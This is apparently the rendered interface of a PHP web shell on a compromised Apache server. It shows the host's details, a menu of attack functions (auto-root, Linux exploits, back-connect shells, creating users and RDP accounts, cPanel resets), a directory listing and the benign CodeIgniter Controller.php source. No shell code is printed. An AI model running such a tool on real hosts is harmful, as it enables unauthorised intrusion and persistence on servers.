Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxr-x--x
Autoloader
[ DIR ]
drwxr-x--x
CLI
[ DIR ]
drwxr-x--x
Cache
[ DIR ]
drwxr-x--x
Commands
[ DIR ]
drwxr-x--x
Config
[ DIR ]
drwxr-x--x
Cookie
[ DIR ]
drwxr-x--x
Debug
[ DIR ]
drwxr-x--x
Email
[ DIR ]
drwxr-x--x
Encryption
[ DIR ]
drwxr-x--x
Entity
[ DIR ]
drwxr-x--x
Events
[ DIR ]
drwxr-x--x
Exceptions
[ DIR ]
drwxr-x--x
Files
[ DIR ]
drwxr-x--x
Filters
[ DIR ]
drwxr-x--x
Format
[ DIR ]
drwxr-x--x
HTTP
[ DIR ]
drwxr-x--x
Honeypot
[ DIR ]
drwxr-x--x
I18n
[ DIR ]
drwxr-x--x
Images
[ DIR ]
drwxr-x--x
Log
[ DIR ]
drwxr-x--x
Modules
[ DIR ]
drwxr-x--x
Pager
[ DIR ]
drwxr-x--x
RESTful
[ DIR ]
drwxr-x--x
Router
[ DIR ]
drwxr-x--x
Security
[ DIR ]
drwxr-x--x
Session
[ DIR ]
drwxr-x--x
Test
[ DIR ]
drwxr-x--x
ThirdParty
[ DIR ]
drwxr-x--x
Throttle
[ DIR ]
drwxr-x--x
Typography
[ DIR ]
drwxr-x--x
Validation
[ DIR ]
drwxr-x--x
View
[ DIR ]
drwxr-x--x
core
[ DIR ]
drwxr-x--x
database
[ DIR ]
drwxr-x--x
fonts
[ DIR ]
drwxr-x--x
helpers
[ DIR ]
drwxr-x--x
language
[ DIR ]
drwxr-x--x
libraries
[ DIR ]
drwxr-x--x
.htaccess
118
B
-rwxr-x--x
BaseModel.php
47.38
KB
-rwxr-x--x
CodeIgniter.php
28.32
KB
-rwxr-x--x
Common.php
34.08
KB
-rwxr-x--x
ComposerScripts.php
4.55
KB
-rwxr-x--x
Controller.php
4.26
KB
-rwxr-x--x
Entity.php
484
B
-rwxr-x--x
Model.php
23.79
KB
-rwxr-x--x
bootstrap.php
4.22
KB
-rwxr-x--x
index.html
131
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Controller.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace CodeIgniter; use CodeIgniter\HTTP\Exceptions\HTTPException; use CodeIgniter\HTTP\RequestInterface; use CodeIgniter\HTTP\ResponseInterface; use CodeIgniter\Validation\Exceptions\ValidationException; use CodeIgniter\Validation\Validation; use Config\Services; use Psr\Log\LoggerInterface; /** * Class Controller */ class Controller { /** * Helpers that will be automatically loaded on class instantiation. * * @var array */ protected $helpers = []; /** * Instance of the main Request object. * * @var RequestInterface */ protected $request; /** * Instance of the main response object. * * @var ResponseInterface */ protected $response; /** * Instance of logger to use. * * @var LoggerInterface */ protected $logger; /** * Should enforce HTTPS access for all methods in this controller. * * @var int Number of seconds to set HSTS header */ protected $forceHTTPS = 0; /** * Once validation has been run, will hold the Validation instance. * * @var Validation */ protected $validator; /** * Constructor. * * @throws HTTPException */ public function initController(RequestInterface $request, ResponseInterface $response, LoggerInterface $logger) { $this->request = $request; $this->response = $response; $this->logger = $logger; if ($this->forceHTTPS > 0) { $this->forceHTTPS($this->forceHTTPS); } // Autoload helper files. helper($this->helpers); } /** * A convenience method to use when you need to ensure that a single * method is reached only via HTTPS. If it isn't, then a redirect * will happen back to this method and HSTS header will be sent * to have modern browsers transform requests automatically. * * @param int $duration The number of seconds this link should be * considered secure for. Only with HSTS header. * Default value is 1 year. * * @throws HTTPException */ protected function forceHTTPS(int $duration = 31536000) { force_https($duration, $this->request, $this->response); } /** * Provides a simple way to tie into the main CodeIgniter class and * tell it how long to cache the current page for. */ protected function cachePage(int $time) { CodeIgniter::cache($time); } /** * Handles "auto-loading" helper files. * * @deprecated Use `helper` function instead of using this method. * * @codeCoverageIgnore */ protected function loadHelpers() { if (empty($this->helpers)) { return; } helper($this->helpers); } /** * A shortcut to performing validation on input data. If validation * is not successful, a $errors property will be set on this class. * * @param array|string $rules * @param array $messages An array of custom error messages */ protected function validate($rules, array $messages = []): bool { $this->validator = Services::validation(); // If you replace the $rules array with the name of the group if (is_string($rules)) { $validation = config('Validation'); // If the rule wasn't found in the \Config\Validation, we // should throw an exception so the developer can find it. if (! isset($validation->{$rules})) { throw ValidationException::forRuleNotFound($rules); } // If no error message is defined, use the error message in the Config\Validation file if (! $messages) { $errorName = $rules . '_errors'; $messages = $validation->{$errorName} ?? []; } $rules = $validation->{$rules}; } return $this->validator->withRequest($this->request)->setRules($rules, $messages)->run(); } }
Close